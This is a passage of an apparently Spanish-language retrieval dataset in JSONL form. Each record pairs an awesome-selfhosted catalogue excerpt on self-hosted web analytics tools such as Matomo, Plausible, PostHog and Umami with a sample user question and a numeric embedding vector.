0.03062, 0.08349, 0.17747, -0.04267, -0.03496, -0.01231, -0.01434, 0.00155, -0.10302, 0.10146, 0.0452, 0.14536, 0.0524, 0.00579, -0.10552, 0.02771, -0.0368, -0.01221, -0.08306, -0.09331, 0.03547, -0.03128, -0.05955, -0.03399, -0.00354, -0.10562, -0.0129, 0.04026, -0.018, -0.03299, -0.07879, -0.05162, -0.00419, 0.07966, 0.01255, 0.06128, 0.0035, -0.00796, -0.06846, 0.0259, 0.01538, 0.03095, -0.11286, -0.09639, 0.08901, -0.02466, 0.01977, 0.03461, -0.08527, 0.02221, 0.06399, -0.06015, 0.00374, 0.03654, -0.13284, -0.04463, -0.01433, 0.07593, 0.0298, 0.04724, -0.02776, -0.00851, 0.01891, -0.09124, -0.04979, -0.04263, 0.02269, 0.05808, -0.01892, 0.01638, 0.1383, 0.01562, 0.05007, 0.00174, 0.12354, 0.0478, -0.06902, 0.04707, 0.00427, -0.13775, 0.0735, 0.01589, -0.02993, -0.0942, -0.04359, -0.03834, -0.00754, -0.04297, 0.05778, -0.04994, -0.0465, 0.0074, -0.05669, -0.01785, -0.00673, 0.01561, 0.02331, 0.03013, 0.05878, 0.02505, 0.08342, -0.00197, 0.01498, 0.06967, 0.04648, -0.04569, -0.0606, 0.00785, -0.04016, 0.03683, -0.03314, 0.11026, -0.05682, -0.04413, 0.0611, -0.02484, -0.02139, -0.0592, 0.01825, -0.09907, -0.05591, -0.03209, 0.07044, 0.02218, 0.04269, 0.0252, -0.02706, 0.06263, 0.08968, 0.01151, -0.02665, -0.02713, 0.04378, 0.00438, 0.02946, -0.01912, -0.03475, -0.01716, -0.0017, 0.01102, 0.01103, -0.01798, -0.06536, -0.06258, -0.03474, -0.07545, 0.01053, 0.06448, -0.01655, -0.05624, 0.01204, -0.02912, -0.08994, 0.02117, 0.00282, -0.09482, -0.02199, -0.01957, 0.04173, -0.04065, 0.05584, 0.00262]} -{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: GoatCounter β€” Easy web statistics without tracking of personal data [EUPL-1.2, Go]. HitKeep β€” Privacy-first web analytics with goals, funnels, ecommerce tracking, and team management in a single binary with embedded DuckDB (alternative to Google Analytics, Plausible, Umami) [MIT, Go/Docker]. Litlyx β€” All-in-one Analytics Solution. Setup in 30 seconds. Display all your data on an AI-powered dashboard. Fully self-hostable and GDPR compliant [Apache-2.0, Docker]. Liwan β€” Privacy-first web analytics [Apache-2.0, Rust/Docker]. Matomo β€” Web analytics that protects your data and your customers' privacy (alternative to Google Analytics) [GPL-3.0, PHP]. Medama Analytics β€” Privacy-first website analytics. Tiny, simple, and cookie-free [Apache-2.0/MIT, Docker/Go]. Metabase β€” Easy way for everyone in your company to ask questions and learn from data [AGPL-3.0, Java/Docker]. Middleware β€” Tool designed to help engineering leaders measure and analyze the effectiveness of their teams using the DORA metrics [Apache-2.0, Docker/Python/Nodejs].", "indexar": "necesito una herramienta para ver el rendimiento de mis equipos basΓ‘ndome en mΓ©tricas como DORA.", "v": [-0.01207, -0.03704, -0.09919, -0.14867, 0.01981, 0.04873, -0.12306, 0.08957, -0.06363, -0.11529, -0.12437, -0.08241, 0.01775, -0.20335, 0.07398, 0.07852, 0.1078, -0.03904, -0.05219, -0.03733, 0.02152, -0.1405, -0.11792, -0.09319, -0.01724, 0.08414, 0.07184, 0.01435, -0.27751, 0.06938, -0.0027, 0.0161, 0.07941, -0.16569, -0.00635, -0.19461, -0.09351, -0.041, 0.08583, 0.08498, -0.11781, 0.10506, -0.02877, -0.0053, 0.14467, -0.01362, -0.03071, 0.08614, -0.01426, -0.08194, -0.0162, -0.04598, -0.03145, -0.00019, -0.06987, -0.16407, 0.14537, -0.08507, 0.04568, -0.13374, -0.04754, -0.10715, -0.03724, -0.06466, 0.01957, 0.04808, -0.11525, -0.11287, -0.07464, -0.00178, 0.01139, 0.05475, 0.00514, -0.00833, -0.00726, 0.01783, 0.0246, 0.07281, -0.03803, 0.00244, 0.08605, 0.05405, -0.11507, 0.05529, -0.13474, -0.06655, 0.14041, -0.0002, 0.10217, -0.04739, -0.02574, 0.03033, -0.12008, -0.03866, -0.03273, 0.01443, 0.09585, -0.02212, -0.02405, 0.02137, 0.0544, 0.01198, -0.00624, 0.01149, -0.00164, 0.00817, -0.01836, 0.03219, -0.02382, 0.00837, 0.04954, -0.03322, -0.01585, 0.0441, 0.03642, 0.03293, -0.07696, -0.01917, -0.04845, -0.00227, 0.05684, -0.00818, 0.02954, -0.13856, -0.02133, -0.05608, 0.02692, -0.03062, 0.12605, -0.00262, 0.04624, -0.04524, -0.07188, 0.0508, -0.04527, 0.03496, -0.00608, -0.09285, -0.05669, -0.04142, -0.02168, 0.04956, -0.03196, -0.05464, 0.0617, -0.03094, 0.03448, 0.00367, -0.06784, -0.0173, 0.0676, -0.02403, 0.02387, 0.0077, -0.06591, -0.02363, -0.01482, 0.05795, -0.08562, 0.00558, -0.04755, -0.06638, 0.07747, 0.00409, 0.03913, -0.05826, 0.08175, 0.02534, 0.02086, 0.05241, -0.02183, -0.03212, 0.00478, -0.04386, 0.03439, -0.01569, 0.04984, 0.03785, 0.0358, -0.05466, 0.0263, -0.01289, 0.00642, -0.00049, 0.04939, -0.03193, 0.01278, -0.03537, -0.00051, 0.02369, 0.02708, 0.01542, 0.00256, -0.08677, 0.0372, 0.03391, -0.00276, -0.08586, 0.00781, -0.01912, -0.05925, -0.01654, -0.05597, 0.01344, -0.00012, 0.05281, -0.00516, -0.02185, -0.03622, 0.04023, 0.06299, 0.04356, -0.07836, -0.03345, -0.01244, -0.03625, -0.0031, 0.04077, 0.01977, 0.01538, 0.02664, 0.0331, -0.00189, -0.02533, 0.01463, 0.05024, 0.00348, 0.03191, 0.02466, -0.03772, 0.03718, -0.02329, -0.00041, 0.04475, -0.00076, -0.03964, 0.00909, -0.04727, -0.00545, -0.03108, -0.04019, 0.00898, 0.06952, 0.00339, -0.02675, 0.034, 0.02406, -0.03086, -0.01303, -0.09126, 0.02242, 0.01172, 0.0342, -0.0488, 0.03934, -0.04562]} -{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: GoatCounter β€” Easy web statistics without tracking of personal data [EUPL-1.2, Go]. HitKeep β€” Privacy-first web analytics with goals, funnels, ecommerce tracking, and team management in a single binary with embedded DuckDB (alternative to Google Analytics, Plausible, Umami) [MIT, Go/Docker]. Litlyx β€” All-in-one Analytics Solution. Setup in 30 seconds. Display all your data on an AI-powered dashboard. Fully self-hostable and GDPR compliant [Apache-2.0, Docker]. Liwan β€” Privacy-first web analytics [Apache-2.0, Rust/Docker]. Matomo β€” Web analytics that protects your data and your customers' privacy (alternative to Google Analytics) [GPL-3.0, PHP]. Medama Analytics β€” Privacy-first website analytics. Tiny, simple, and cookie-free [Apache-2.0/MIT, Docker/Go]. Metabase β€” Easy way for everyone in your company to ask questions and learn from data [AGPL-3.0, Java/Docker]. Middleware β€” Tool designed to help engineering leaders measure and analyze the effectiveness of their teams using the DORA metrics [Apache-2.0, Docker/Python/Nodejs].", "indexar": "cuΓ‘l es una alternativa privada a Google Analytics que funcione con un solo archivo?", "v": [0.01847, 0.06384, 0.01319, -0.0941, -0.0186, -0.14079, 0.07903, -0.09477, -0.17137, 0.02729, -0.05744, -0.16425, -0.03696, 0.11949, 0.11966, -0.0888, 0.0993, -0.13534, 0.08665, 0.00299, -0.14994, -0.00937, -0.07845, -0.11468, -0.05752, -0.10625, 0.02085, 0.0191, -0.14156, 0.02159, 0.00569, 0.00569, -0.02792, -0.05881, -0.11009, 0.04184, 0.04826, 0.0779, -0.03631, -0.02732, 0.0045, -0.10037, -0.1108, 0.1417, -0.10567, -0.04417, -0.02303, 0.04176, -0.01287, 0.01601, -0.10227, -0.03585, -0.10544, 0.08096, 0.00908, 0.02832, 0.0316, -0.16029, 0.05042, 0.03377, -0.09861, 0.03553, 0.02978, 0.09952, 0.06148, 0.00317, 0.03911, 0.0321, -0.14808, 0.05162, -0.05598, 0.09003, -0.08436, 0.00061, 0.0864, 0.08492, 0.00071, -0.01304, -0.11802, 0.02375, 0.05687, -0.13909, -0.03495, 0.02059, -0.0984, -0.05445, 0.00329, -0.11023, 0.0337, -0.085, 0.03285, 0.03257, -0.06207, 0.07814, -0.0347, 0.04983, 0.12527, -0.08021, -0.00729, -0.07176, 0.13721, 0.04271, -0.06292, 0.05432, 0.12771, 0.02473, -0.02947, 0.00978, -0.10711, -0.01017, -0.01765, 0.04399, 0.03122, 0.04899, 0.02436, -0.00288, -0.09839, -0.00419, -0.02586, -0.00332, -0.05102, -0.04836, -0.10295, -0.04126, -0.10614, 0.03554, -0.0841, 0.04357, 0.02458, -0.01398, -0.00583, -0.00796, -0.06071, -0.00882, -0.06362, 0.11503, 0.02164, 0.03437, 0.0144, -0.02355, 0.07931, -0.03416, 0.09454, -0.0008, 0.1054, -0.04331, -0.02718, -0.02255, -0.08688, -0.06401, -0.03166, -0.02302, -0.04558, 0.04858, -0.10109, 0.05169, -0.05738, -0.10327, -0.00683, 0.03499, -0.01234, -0.03353, -0.01248, 0.03892, 0.01637, -0.04879, 0.03483, -0.05493, -0.02958, -0.0174, -0.01121, 0.02599, -0.04463, -0.14399, 0.02938, -0.01106, -0.03317, -0.08725, 0.13888, -0.02249, -0.03242, -0.00201, 0.0186, 0.02836, -0.02184, -0.09609, 0.00864, -0.03223, 0.02312, 0.08293, -0.00768, 0.02242, 0.0083, 0.02858, 0.04418, -0.01829, -0.06121, -0.06024, -0.04176, 0.03943, -0.0289, -0.01336, -0.0081, 0.02521, 0.00881, -0.00351, 0.00167, 0.02163, 0.02762, -0.03662, 0.01318, 0.007, 0.05503, -0.0616, -0.00596, 0.05796, 0.00938, 0.00957, 0.00507, -0.02245, -0.00328, -0.00347, 0.04487, -0.05407, 0.01202, 0.03212, 0.05011, 0.04494, -0.0898, 0.00241, 0.01919, 0.0576, -0.01698, 0.03839, 0.04922, -0.03019, 0.00032, -0.008, -0.00837, -0.06396, 0.06691, 0.01045, -0.0084, 0.05468, -0.01476, -0.00899, -0.03998, 0.06106, 0.01387, -0.08909, -0.05935, 0.00147, 0.04615, 0.00302, 0.06226, -0.02813]} -{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: Netron β€” Visualizer for neural network and machine learning models [MIT, Python/Nodejs]. Offen β€” Fair, lightweight and open web analytics tool. Gain insights while your users have full access to their data [Apache-2.0, Go/Docker]. Plausible Analytics β€” Simple, lightweight (< 1 KB) and privacy-friendly web analytics [AGPL-3.0, Elixir]. PostHog β€” Product analytics, session recording, feature flagging and a/b testing that you can self-host (alternative to Mixpanel, Amplitude, Heap, HotJar, Optimizely) [MIT, Python]. Postiz β€” Schedule posts, track the performance of your content, and manage all your social media accounts in one place (Alternative to Buffer, Hootsuite, Sprout Social) [⚠, AGPL-3.0, Docker]. Prisme Analytics β€” Privacy-focused and progressive analytics service based on Grafana [AGPL-3.0/MIT, Docker]. Redash β€” Connect and query your data sources, build dashboards to visualize data and share them with your company [BSD-2-Clause, Docker].", "indexar": "cual es una alternativa libre a Mixpanel para analΓ­ticas de producto?", "v": [-0.00637, 0.06058, -0.04214, -0.13353, -0.08862, -0.09017, -0.01028, -0.08076, -0.26961, -0.03431, -0.01728, -0.10931, -0.03697, 0.02971, 0.05622, -0.03435, 0.00504, -0.1534, 0.18721, 0.01983, -0.10617, -0.05974, -0.255, -0.16566, -0.09225, 0.04641, 0.00552, -0.00307, -0.02601, -0.0101, 0.02137, -0.04375, -0.02618, -0.00761, -0.10736, -0.01574, 0.09928, 0.05718, 0.10162, -0.08753, -0.06232, -0.11636, -0.01204, 0.00013, 0.02956, 0.0399, 0.00501, 0.06294, -0.02186, 0.05266, -0.0409, -0.01928, -0.11754, 0.07661, 0.09809, -0.1221, 0.09548, -0.12345, 0.02535, -0.02594, 0.10626, 0.09426, 0.07131, -0.0469, 0.03427, 0.00386, -0.17917, -0.03211, 0.01465, 0.12395, 0.04109, -0.00973, -0.0142, -0.07457, -0.07723, 0.1011, -0.06102, 0.07331, -0.01694, 0.01771, 0.04347, -0.04487, 0.02588, 0.10639, -0.04197, -0.05613, 0.01043, -0.11841, -0.03775, 0.01771, 0.03691, -0.00482, -0.05767, 0.10315, 0.03135, -0.15149, 0.06867, 0.04672, -0.05129, 0.02327, 0.11078, 0.00338, -0.07219, 0.02634, 0.04564, -0.06923, -0.10537, 0.0334, -0.09503, 0.05428, -0.01303, 0.08753, 0.01904, -0.0092, 0.01421, -0.00677, -0.05476, 0.06019, -0.06661, 0.02331, 0.068, -0.00967, -0.09553, -0.05923, -0.00268, 0.03132, 0.10498, -0.03273, -0.04136, 0.00288, 0.0679, 0.01698, -0.03564, -0.00894, -0.0653, -0.04811, 0.09662, -0.02057, -0.04933, 0.0141, 0.03931, 0.08495, 0.01855, 0.03962, 0.04349, -0.02944, -0.06679, 0.04593, 0.01795, 0.05354, -0.03984, 0.03337, -0.01831, 0.05365, -0.02756, -0.03228, -0.04455, -0.02959, -0.03217, -0.0112, 0.00768, -0.06975, 0.03254, 0.04974, 0.03537, 0.00284, 0.00348, -0.03089, -0.06808, 0.02976, 0.02871, 0.06389, 0.08248, -0.05492, 0.0148, -0.04814, -0.03789, -0.04677, 0.00886, -0.06968, -0.0037, 0.01253, -0.03501, 0.03299, 0.01386, 0.00945, 0.00116, -0.00326, 0.07161, 0.06397, -0.03942, 0.04346, -0.04267, -0.09198, 0.02053, -0.04287, 0.09077, -0.08183, -0.07531, -0.01953, -0.05895, -0.00774, 0.01685, -0.08205, -0.0281, -0.00427, -0.02158, 0.0324, 0.07339, 0.03664, 0.01722, -0.02026, 0.05564, 0.02375, -0.04131, 0.01633, -0.01294, -0.00244, 0.0098, 0.05018, 0.03495, 0.01414, 0.0037, 0.07426, -0.04909, 0.01198, -0.02392, 0.04604, -0.07777, -0.03872, 0.00123, 0.0068, 0.05314, 0.0471, -0.00941, 0.00039, 0.03372, 0.00672, 0.02088, 0.04782, 0.04746, 0.06391, -0.04529, 0.01791, 0.00789, 0.02473, -0.07219, -0.05091, -0.05618, -0.06678, -0.03903, -0.002, -0.04491, 0.00453, 0.0435, 0.03254]} -{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: Netron β€” Visualizer for neural network and machine learning models [MIT, Python/Nodejs]. Offen β€” Fair, lightweight and open web analytics tool. Gain insights while your users have full access to their data [Apache-2.0, Go/Docker]. Plausible Analytics β€” Simple, lightweight (< 1 KB) and privacy-friendly web analytics [AGPL-3.0, Elixir]. PostHog β€” Product analytics, session recording, feature flagging and a/b testing that you can self-host (alternative to Mixpanel, Amplitude, Heap, HotJar, Optimizely) [MIT, Python]. Postiz β€” Schedule posts, track the performance of your content, and manage all your social media accounts in one place (Alternative to Buffer, Hootsuite, Sprout Social) [⚠, AGPL-3.0, Docker]. Prisme Analytics β€” Privacy-focused and progressive analytics service based on Grafana [AGPL-3.0/MIT, Docker]. Redash β€” Connect and query your data sources, build dashboards to visualize data and share them with your company [BSD-2-Clause, Docker].", "indexar": "quΓ© herramienta sirve para visualizar modelos de redes neuronales?", "v": [0.01742, -0.04825, -0.10007, -0.17596, 0.02808, -0.03008, -0.22215, -0.04677, 0.02226, -0.13896, -0.00223, -0.12594, 0.02642, -0.10175, 0.03155, 0.06528, 0.01802, -0.09244, 0.08821, 0.09992, -0.11177, -0.07201, -0.1505, -0.00388, -0.06455, 0.06255, 0.03238, 0.03304, -0.06731, 0.13454, -0.09728, -0.06108, 0.06225, -0.113, -0.15776, 0.05065, -0.0236, 0.05348, -0.05133, 0.00573, -0.03089, 0.09606, -0.11841, -0.00149, 0.11192, 0.07243, -0.16093, -0.09393, -0.02916, 0.07013, 0.01771, -0.02005, -0.08767, 0.02292, -0.0213, -0.13674, 0.1521, -0.04734, -0.00466, -0.11216, -0.04049, -0.07647, 0.00954, -0.07467, -0.05581, -0.0895, 0.05128, 0.01176, -0.10733, 0.03514, -0.03382, 0.02409, 0.0758, -0.06597, 0.01139, 0.04268, -0.06594, -0.00536, 0.12262, 0.02681, 0.07929, -0.02999, -0.13276, 0.02885, -0.02931, 0.0312, 0.06657, -0.01783, -0.00895, -0.08459, -0.05635, 0.09178, -0.03595, -0.01101, 0.01103, 0.08109, -0.00514, -0.04789, 0.02815, 0.0007, 0.04853, -0.02044, -0.06927, 0.08904, -0.08145, -0.04506, -0.00405, -0.00947, -0.03523, -0.09517, 0.08644, 0.0313, -0.06746, 0.02228, -0.05619, 0.09769, 0.00684, 0.03577, 0.03687, -0.02534, 0.05274, 0.07546, -0.03414, -0.02758, -0.04666, 0.04513, -0.02579, 0.12452, 0.0265, -0.03602, 0.00374, -0.02933, -0.02453, -0.02194, -0.04555, -0.00269, -0.02757, -0.08622, -0.027, -0.10324, 0.03161, -0.04895, -0.02449, -0.10544, -0.07586, 0.02412, 0.07215, -0.1005, -0.03299, -0.0104, 0.07841, 0.01904, 0.01338, -0.09253, -0.02154, 0.01834, -0.1024, 0.03429, -0.07137, 0.05415, -0.07099, 0.01355, 0.06263, 0.04691, 0.04166, -0.04689, -0.03825, 0.07289, 0.06453, 0.0935, -2e-05, 0.04555, -0.03093, -0.01261, -0.01636, 0.02134, -0.05842, 0.06445, -0.00186, -0.04955, -0.07214, 0.00121, 0.00481, -0.03633, 0.02577, -0.0639, 0.01275, -0.01758, -0.02899, 0.03977, -0.05735, 0.02841, 0.0196, -0.02281, 0.1807, -0.06052, -0.0353, -0.00343, 0.09338, 0.02064, -0.02144, 0.01087, -0.01717, -0.02263, -0.01989, 0.05605, 0.00026, -0.0226, -0.00642, 0.1127, -0.07372, -0.03943, -0.00379, -0.02936, 0.00652, 0.02574, 0.02291, 0.01578, 0.0171, 0.00824, 0.03779, -0.01522, 0.0206, 0.06094, -0.08142, 0.06296, -0.03386, 0.02306, -0.0098, -0.04729, 0.06255, -0.04398, -0.04178, -0.00673, -0.00754, -0.07203, 0.01364, -0.02518, -0.01781, -0.00136, -0.01496, 0.01993, -0.02242, 0.01078, -0.01066, -0.05724, -0.0467, -0.02538, 0.00144, -0.07756, -0.07133, -0.00329, 0.09822, -0.06026, 0.01613, -0.00648]} -{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: Netron β€” Visualizer for neural network and machine learning models [MIT, Python/Nodejs]. Offen β€” Fair, lightweight and open web analytics tool. Gain insights while your users have full access to their data [Apache-2.0, Go/Docker]. Plausible Analytics β€” Simple, lightweight (< 1 KB) and privacy-friendly web analytics [AGPL-3.0, Elixir]. PostHog β€” Product analytics, session recording, feature flagging and a/b testing that you can self-host (alternative to Mixpanel, Amplitude, Heap, HotJar, Optimizely) [MIT, Python]. Postiz β€” Schedule posts, track the performance of your content, and manage all your social media accounts in one place (Alternative to Buffer, Hootsuite, Sprout Social) [⚠, AGPL-3.0, Docker]. Prisme Analytics β€” Privacy-focused and progressive analytics service based on Grafana [AGPL-3.0/MIT, Docker]. Redash β€” Connect and query your data sources, build dashboards to visualize data and share them with your company [BSD-2-Clause, Docker].", "indexar": "con quΓ© puedo montar un sistema de analΓ­ticas web ligero y respetuoso con la privacidad?", "v": [-0.06075, 0.00389, -0.13219, -0.12814, -0.0434, -0.05317, -0.05495, -0.0248, -0.17118, -0.06952, -0.07406, -0.04913, 0.10598, -0.00227, 0.13889, 0.05654, 0.05866, -0.08258, 0.06953, -0.01551, -0.07717, -0.18005, -0.13621, -0.11017, -0.00812, 0.03772, 0.10192, -0.00395, -0.04682, 0.04583, -0.02507, 0.10574, -0.05975, 0.06474, -0.08449, 0.08431, 0.08092, 0.09205, 0.01793, 0.0501, 0.11312, -0.09591, 0.0195, 0.11834, 0.14792, -0.02466, -0.01114, -0.04931, 0.04531, -0.05763, 0.00974, 0.06098, -0.02326, -0.06224, 0.04528, -0.03699, 0.10008, -0.0585, 0.18618, 0.04309, -0.0369, 0.19053, 0.0601, 0.14722, 0.06492, -0.1076, -0.03416, -0.03761, -0.07555, 0.06395, 0.09337, -0.06519, 0.04372, 0.03937, 0.01066, 0.04184, -0.0151, 0.05512, 0.05923, 0.07281, -0.02854, -0.0013, -0.04808, 0.12107, -0.04239, -0.01532, 0.00012, -0.07651, -0.00738, -0.06317, 0.13794, 0.09131, -0.0584, 0.00497, 0.05116, -0.09025, 0.01515, 0.05526, -0.10478, -0.10285, 0.00032, 0.05719, -0.09953, 0.05363, 0.06358, 0.00443, 0.04329, -0.01153, 0.0259, -0.10564, 0.01966, 0.07122, -0.10954, -0.01216, 0.02468, 0.00321, -0.06095, 0.044, -0.00582, -0.04012, -0.04675, 0.0083, 0.00498, -0.10617, 0.02728, -0.00468, -0.01285, 0.101, -0.04103, 0.04609, -0.04093, -0.01673, -0.09836, 0.01846, 0.01502, 0.00917, -0.10248, -0.00716, -0.00058, 0.02727, 0.0542, 0.0545, -0.00277, -0.03029, 0.08315, 0.00664, 0.01555, -0.03458, -0.0306, -0.04514, 0.0315, 0.12288, -0.03864, 0.00147, -0.08016, -0.02951, -0.0263, -0.13115, 0.04276, -0.03265, 0.06601, 0.04154, -0.03325, 0.04328, 0.03604, 0.04197, -0.00964, -0.07907, 0.01783, 0.01924, -0.02544, 0.02228, 0.00282, -0.08376, 0.10776, 0.01706, -0.08817, -0.06814, 0.05129, -0.0104, -0.0176, 0.0158, 0.02923, 0.01375, -0.04975, 0.05298, 0.04295, 0.0304, 0.00465, 0.03554, -0.02513, 0.07588, -0.03131, 0.08669, 0.10603, -0.06448, -0.00781, 0.03955, -0.0028, 0.08134, -0.01293, 0.0187, 0.01524, -0.03994, -0.0329, 0.06915, 0.03626, -0.0055, 0.04883, 0.01442, 0.02383, 0.01303, 0.04419, -0.09259, -0.01641, 0.04375, -0.00345, 0.01576, -0.04073, 0.04606, -0.01025, 0.0034, 0.06235, -0.00523, 0.03232, 0.00092, 0.03346, 0.0315, 0.00491, -0.01294, -0.01081, -0.06873, 0.02675, -0.03238, 0.03426, -0.04399, -0.0332, -0.0712, -0.04392, -0.00233, 0.04492, 0.05263, 0.03245, -0.04554, 0.01509, -0.07443, -0.08937, 0.00051, 0.00542, -0.10661, -0.06828, 0.0039, -0.01882, -0.07035, -0.05356, -0.00381]} -{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: Rybbit β€” Web and products analytics that is easy to setup and more intuitive (alternative to Google Analytics) [AGPL-3.0, Docker]. Shaper β€” Build Data Dashboards all in SQL. Powered by DuckDB [MPL-2.0, Docker/Nodejs/Python/Go]. Socioboard β€” Social media management, analytics, and reporting platform supporting nine social media networks out-of-the-box [⚠, GPL-3.0, Nodejs]. Statistics for Strava β€” Statistics dashboard generated from Strava data [⚠, AGPL-3.0, Docker]. Superset β€” Modern data exploration and visualization platform [Apache-2.0, Python]. Swetrix β€” Ultimate, open-source web analytics to satisfy all your needs [AGPL-3.0, Docker]. Umami β€” Simple, fast, privacy-focused alternative to Google Analytics [MIT, Nodejs/Docker]. Vince β€” Web analytics and dashboard (alternative to Google Analytics) [AGPL-3.0, Go/Docker/K8S/deb].", "indexar": "cuΓ‘l es un programa de anΓ‘lisis web que sea mΓ‘s intuitivo y fΓ‘cil de configurar?", "v": [0.10868, 0.15174, -0.1729, -0.0573, 0.135, -0.1672, 0.01589, -0.05525, -0.19544, -0.06587, -0.03481, -0.03825, -0.10082, -0.03353, -0.05948, 0.06381, 0.04736, -0.13924, -0.01011, 0.04211, -0.03868, -0.0537, -0.12104, -0.01112, -0.11097, -0.0078, -0.05229, 0.00144, 0.02515, 0.00091, -0.04932, 0.02609, 0.08874, -0.05266, -0.04424, -0.04775, 0.0523, 0.05558, -0.03842, 0.06171, 0.00243, -0.09489, -0.03187, 0.07588, 0.07119, -0.0077, 0.03405, -0.03461, 0.05867, -0.05654, 0.0138, -0.06115, -0.01183, -0.00275, 0.04738, -0.08144, 0.11413, -0.19709, 0.09696, -0.08153, -0.00409, 0.12102, 0.05844, 0.04867, -0.02214, -0.03475, 0.00191, 0.05315, -0.01792, 0.01244, 0.01396, 0.0315, -0.00852, -0.04855, 0.15511, 0.10647, -0.03329, 0.03818, 0.10403, -0.02201, 0.02854, -0.04981, -0.08303, 0.01654, -0.13548, -0.04396, 0.07696, -0.08068, -0.03012, -0.05638, 0.02727, -0.01137, -0.01285, 0.03676, 0.02562, -0.03651, 0.11714, 0.012, 0.03607, 0.0123, 0.07343, -0.05477, -0.1527, 0.10725, 0.04196, 0.14358, 0.06636, -0.03724, -0.08492, -0.00249, 0.01247, 0.0064, -0.03622, -0.10463, -0.02905, -0.00701, -0.01493, -0.01549, 0.05239, -0.09185, -0.06843, 0.06004, -0.081, -0.00834, -0.00054, 0.04248, -0.01112, 0.09167, 0.05319, 0.06002, -0.02622, -0.06034, -0.05831, 0.03937, -0.09872, 0.01559, -0.02682, -0.00156, -0.02039, -0.07928, -0.00918, 0.06072, 0.00522, 0.01494, 0.06225, -0.042, -0.00897, -0.04602, -0.06453, 0.0745, -0.08076, 0.03182, -0.047, 0.04367, -0.04505, -0.05549, -0.0284, -0.09406, -0.10231, 0.0331, -0.08402, -0.02724, 0.01161, 0.00528, 0.10645, -0.06178, -0.06471, 0.0181, 0.08924, 0.01188, -0.02217, 0.07353, -0.02396, -0.04895, 0.00587, -0.01945, -0.0025, -0.0913, 0.07316, -0.02153, -0.08507, 0.01456, 0.07916, 0.01825, -0.06392, -0.05303, -0.0821, 0.02394, -0.03033, 0.01896, 0.04661, 0.05791, -0.0713, 0.0016, 0.0904, -0.02748, -0.01942, -0.04374, -0.00154, -0.04476, -0.06472, -0.0631, -0.04514, -0.04633, 0.01811, 0.1185, -0.05621, 0.00595, 0.00271, 0.06659, -0.00261, -0.0548, 0.0801, -0.02326, -0.01391, 0.00529, 0.05257, 0.00228, 0.02964, 0.02862, 0.00604, 0.01852, 0.06773, 0.00421, -0.03694, -0.03152, 0.04616, 0.03206, 0.05014, 0.00851, -0.03735, -0.02899, -0.00422, -0.03512, -0.01296, -0.00755, 0.08465, -0.01656, -0.05358, -0.03587, 0.05096, 0.0962, 0.00148, -0.03468, -0.04434, -0.06656, -0.10403, 0.06504, -0.02065, -0.03309, -0.09395, 0.0528, 0.10036, -0.0711, 0.02219, 0.00869]} -{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: Rybbit β€” Web and products analytics that is easy to setup and more intuitive (alternative to Google Analytics) [AGPL-3.0, Docker]. Shaper β€” Build Data Dashboards all in SQL. Powered by DuckDB [MPL-2.0, Docker/Nodejs/Python/Go]. Socioboard β€” Social media management, analytics, and reporting platform supporting nine social media networks out-of-the-box [⚠, GPL-3.0, Nodejs]. Statistics for Strava β€” Statistics dashboard generated from Strava data [⚠, AGPL-3.0, Docker]. Superset β€” Modern data exploration and visualization platform [Apache-2.0, Python]. Swetrix β€” Ultimate, open-source web analytics to satisfy all your needs [AGPL-3.0, Docker]. Umami β€” Simple, fast, privacy-focused alternative to Google Analytics [MIT, Nodejs/Docker]. Vince β€” Web analytics and dashboard (alternative to Google Analytics) [AGPL-3.0, Go/Docker/K8S/deb].", "indexar": "con quΓ© puedo montar una plataforma para visualizar datos usando SQL?", "v": [-0.12256, 0.05266, -0.22581, -0.17152, -0.10101, -0.18523, -0.04392, -0.15386, -0.104, -0.04169, -0.10578, -0.16626, 0.05194, -0.0615, -0.05583, 0.05271, 0.06738, -0.15504, -0.02071, -0.0179, 0.0348, -0.12406, -0.02484, -0.10359, -0.07442, -0.01748, 0.05358, -0.0215, -0.06298, -0.04915, -0.00761, 0.02323, -0.09465, 0.09892, -0.0029, -0.02405, 0.00102, 0.09586, -0.01258, -0.17565, -0.03212, -0.02433, -0.09735, 0.02715, 0.08784, -0.00035, -0.01149, -0.05145, -0.02648, -0.01344, -0.00601, 0.03945, -0.18651, 0.00054, -0.02108, -0.05804, 0.12618, -0.02578, 0.16957, 0.07034, -0.07904, 0.01759, 0.05619, 0.06716, -0.06757, 0.0073, 0.06968, 0.09192, -0.05516, 0.1422, 0.00509, -0.01779, -0.03041, -0.0765, 0.07027, 0.03704, 0.12896, 0.01813, 0.03099, 0.01085, -0.08082, -0.01288, -0.11082, 0.11309, -0.00283, -0.00011, 0.06544, -0.01584, 0.02597, -0.04822, 0.06847, 0.04091, 0.02478, -0.03877, 0.01778, -0.05508, 0.04648, -0.03341, -0.0784, -0.02366, -0.08361, 0.07887, -0.04134, 0.14245, 